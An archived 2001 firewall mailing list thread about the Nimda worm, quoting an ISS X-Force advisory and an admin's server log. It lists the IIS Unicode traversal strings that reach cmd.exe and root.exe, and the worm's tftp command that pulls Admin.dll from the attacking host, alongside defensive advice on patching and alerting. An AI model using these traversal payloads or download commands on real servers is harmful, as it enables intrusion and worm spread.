NETWORK PRESENCE ABOUT SERVICES PRODUCTS TRAINING CONTACT US SEARCH SUPPORT
 


Search
display results
words begin  exact words  any words part 

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [FW1] New worm on the road?



Dean,
 
You're absolutely right, although in that case an FTP request to the outside originated from an IIS will go in the same kind of logging (same rule number) as with a user who installed "sponsored" freeware such as winzip that tries to use FTP to get its latest publicity banners.  I prefer to have separate rules for all servers so I can put proper alarms on those rules.
 
I must admit that I also run snort, both on the outside, dmz and inside.  This gives me really a good insight of what happens.
 
 
Patrick Coomans.
4all NetWorks, your Networking partner!
Molenstraat 65 - 2840 Reet - Belgium
Tel +32-3-880.75.75  Fax 880.75.71
Web site : http://www.4all.be
 
"   Over-reliance on experience
  leads to making the same mistakes
with increasing levels of confidence.  "

>>> Dean Cunningham <[email protected]> 25/09/01 07:21 >>>

For NT shops:
I have forced all that http ftp traffic via a proxy (MS Proxy) that requires
authentication against the NT domain. Based on the theory that any
compromise will use a local machine account and therefore either a) not use
the proxy and try going out the firewall or b) use the proxy and get dropped
cause it was not authenticated

any thoughts

cheers
Dean

-----Original Message-----
From: Patrick Coomans [mailto:[email protected]]
Sent: Sunday, 23 September 2001 9:00 a.m.
To: [email protected]
Subject: RE: [FW1] New worm on the road?


Dennis,

outgoing ftp, tftp, http, ...  from an internal server source is at least
*very* suspicious and probably caused by some hacker who is trying to fetch
his/her tools etc.  so I put proper alerts on a specific rule for this kind
of traffic on my fw1.

Patrick

>>> <[email protected]> 20/09/01 17:52 >>>


Do you mind sharing what you did to accomplish number 2 ?

-----Original Message-----
From: [email protected]
[mailto:[email protected]]On Behalf Of Patrick
Coomans
Sent: Wednesday, September 19, 2001 1:04 AM
To: [email protected]
Cc: [email protected]
Subject: Re: [FW1] New worm on the road?


Thanks for all the replies,
Some of the things I did to secure IIS servers was:

1) continuously install all the latest patches for IIS
2) put alerts on all suspicious outgoing traffic from IIS servers
3) install a product on the IIS servers that performs auto-blocking of the
source IP address when Nimda or Code Red I/II is detected
4) download and install the URL Scan utility from Microsoft

Patrick

>>> LEFEVRE David <[email protected]> 19/09/01 09:09 >>>
I've found this on an other mailling list (Xforce)

Internet Security Systems Security Alert
September 18, 2001

Aggressive Propagation of Nimda Worm

Synopsis:

ISS X-Force has captured a new Internet worm, known as Nimda, that
contains much of the functionality of Code Red worm and its
derivatives. Nimda attempts to identify vulnerable Microsoft IIS servers

and deface them, and attempts to infect additional systems. Nimda is
potentially more dangerous than Code Red or Code Blue, because it
includes a powerful e-mail distribution component. Code Red was limited
to infecting Web servers running IIS. Nimda, on the other hand, can
infect any Windows system, and then distribute further by emailing
copies of itself to individuals in MAPI (Messaging Application
Programming Interface) address books, or by identifying and infecting
vulnerable IIS servers. This distinction means that there may be
millions of infections. Indications of severe network outages related
to the massive amount of network traffic this worm generates have
already been reported.

Description:

Nimda is vastly different from Code Red in how it propagates. Nimda
takes advantage of standard e-mail distribution techniques to broaden
the eligible pool of target hosts. Instead of only attacking Web servers

with Web server vulnerabilities, Nimda is designed to propagate via
spoofed e-mail. The e-mail is spoofed to appear as if it came from
trusted sources. Nimda relies on extensive local propagation once a
system is infected. It replaces .dll, .eml, .nws files on all shared
drives. It also appends itself to all .htm, .html, and .asp files on
the infected system. This also allows the worm to spread to remote
users when they access Web pages on infected servers.

IIS Scanning and Propagation

Nimda will use several Unicode Web Folder Traversal vulnerability attack

strings to probe for vulnerable IIS systems. The attack strings used are

as follows:

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
(root.exe is the backdoor that Code Red II installed on infected
servers)

Nimda appends "/winnt/system32/cmd.exe?/c+dir" to the end of each attack

string and inspects output to determine if the target system is
vulnerable. If a vulnerable IIS Web server is found, Nimda will append
the following command to an attack string to upload a copy of the worm
to the vulnerable server:

tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20

E-mail Propagation

Nimda will read the e-mail address books on the infected system. It will

e-mail a copy of itself to each address in the list. The Subject: lines
of the e-mails containing the worm will vary.

Backdoor Functionality

Once a computer is infected with Nimda, the worm takes steps to
"backdoor" the infected system, by creating accounts that could provide
further access to the system by remote attackers. Nimda will create a
"guest" account if it doesn't already exist, or activate it if it has
been disabled. It will also add the guest user to the "Guests" and
"Administrators" groups.

Nimda will also open the "C:" share to the Internet, giving full access
to the C: drive of the infected computer. Attackers from anywhere on the

Internet may access this share with full read/write access, once this
share is opened.

Recommendations:

ISS RealSecure detects the Nimda worm through the HTTP_IIS_URL_Decoding
signature. This signature was included in Network Sensor X-Press Update
3.1 and Server Sensor 6.0.1. RealSecure Network Sensor also detects the
Nimda worm with the HTTP_Windows_Executable signature.

ISS BlackICE products will the trigger the "2000639 - HTTP UTF8
backtick"
and "2002595 - IIS system32 command" events.

ISS Internet Scanner customers can test for this vulnerability using the

IisUnicodeTranslation check, which was included in XPU 4.4 (and later
updated in XPU 4.8).

ISS System Scanner customers can test for this vulnerability using the
MS00-078 check included in XPU 1.13 (#13).

ISS X-Force recommends that all users contact their anti-virus vendor
for software updates and Nimda removal information.

Microsoft IIS administrators who have not yet installed the patch for
the Web Server Folder Traversal vulnerability are encouraged to do so
immediately.

For Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
<http://www.microsoft.com/ntserver/nts/downloads/critical/q269862>

For Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862
<http://www.microsoft.com/windows2000/downloads/critical/q269862>

The Nimda worm takes advantage of well-known security weaknesses in IIS,

as well as a general lack of security awareness among Internet users
regarding e-mail attachments. ISS recommends that all IIS administrators

apply all security patches immediately and follow published Microsoft
IIS Security Checklists. Please refer to the links in the Additional
Information section.


Additional Information:

ISS X-Force recommends that all Web site administrators review the
appropriate IIS Security Checklist from Microsoft, and verify that their

IIS Web servers have been configured securely. IIS servers that have
been configured securely, using the Checklists, are not vulnerable to
many of the recent and widely publicized remote IIS exploits.

The IIS Security Checklists are available at the following locations:

For Microsoft IIS 4.0:
http://www.microsoft.com/technet/itsolutions/security/tools/iischk.asp
<http://www.microsoft.com/technet/itsolutions/security/tools/iischk.asp>

For Microsoft IIS 5.0:
http://www.microsoft.com/technet/security/iis5chk.asp
<http://www.microsoft.com/technet/security/iis5chk.asp>

Web site administrators are also strongly encouraged to apply the latest

IIS cumulative security patch to prevent Web servers from being
compromised by this and other IIS exploits. This patch is available from

the following Microsoft Security Bulletin:

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>

______

About Internet Security Systems (ISS)
Internet Security Systems is a leading global provider of security
management solutions for the Internet, protecting digital assets and
ensuring safe and uninterrupted e-business. With its industry-leading
intrusion detection and vulnerability assessment, remote managed
security services, and strategic consulting and education offerings, ISS

is a trusted security provider to more than 8,000 customers worldwide
including 21 of the 25 largest U.S. commercial banks and the top 10 U.S.

telecommunications companies. Founded in 1994, ISS is headquartered in
Atlanta, GA, with additional offices throughout North America and
international operations in Asia, Australia, Europe, Latin America and
the Middle East. For more information, visit the Internet Security
Systems web site at www.iss.net <http://www.iss.net/>  or call.

Copyright (c) 2001 Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of the X-Force. If you wish to reprint the whole or any part
of this Alert in any other medium excluding electronic medium, please
e-mail [email protected] for permission.

Disclaimer

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of or
in connection with the use or spread of this information. Any use of
this information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php
<http://xforce.iss.net/sensitive.php>
as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force
[email protected] of Internet Security Systems, Inc.

Best regards,
David

Patrick Coomans wrote:

>  Since this evening I am experiencing massive attacks on HTTP (IIS
> oriented I presume) from many different IP addresses. They all look
> like: GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> GET /scripts/root.exe?/c+dir HTTP/1.0
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
> HTTP/1.0
> GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
> HTTP/1.0
> GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
> HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Is
> anyone aware that this is some new kind of worm?Now my FW1 question:
> can I create a HTTP resource (secure server) that blocks all requests
> that e.g. have a .EXE in it ?  Or would that slow my FW1's down to
> much? Any other suggestions for good products that can do HTTP content
> inspection and that cooperate or can co-exist with fw1
> ?  Thanks,Patrick

--
David LEFEVRE
CARDIF - Architecture et Sécurité Opérationnelle
[email protected] - Tél : 01 41 42 76 63
     [email protected] - Tel : 01 41 42 24 22



***************************************************
This e-mail is  not an  official  statement of  the
Waikato  Regional  Council unless otherwise stated.
Visit our website http://www.ew.govt.nz
***************************************************


================================================================================
     To unsubscribe from this mailing list, please see the instructions at
               http://www.checkpoint.com/services/mailing.html
================================================================================



 
----------------------------------

ABOUT SERVICES PRODUCTS TRAINING CONTACT US SEARCH SUPPORT SITE MAP LEGAL
   All contents © 2004 Network Presence, LLC. All rights reserved.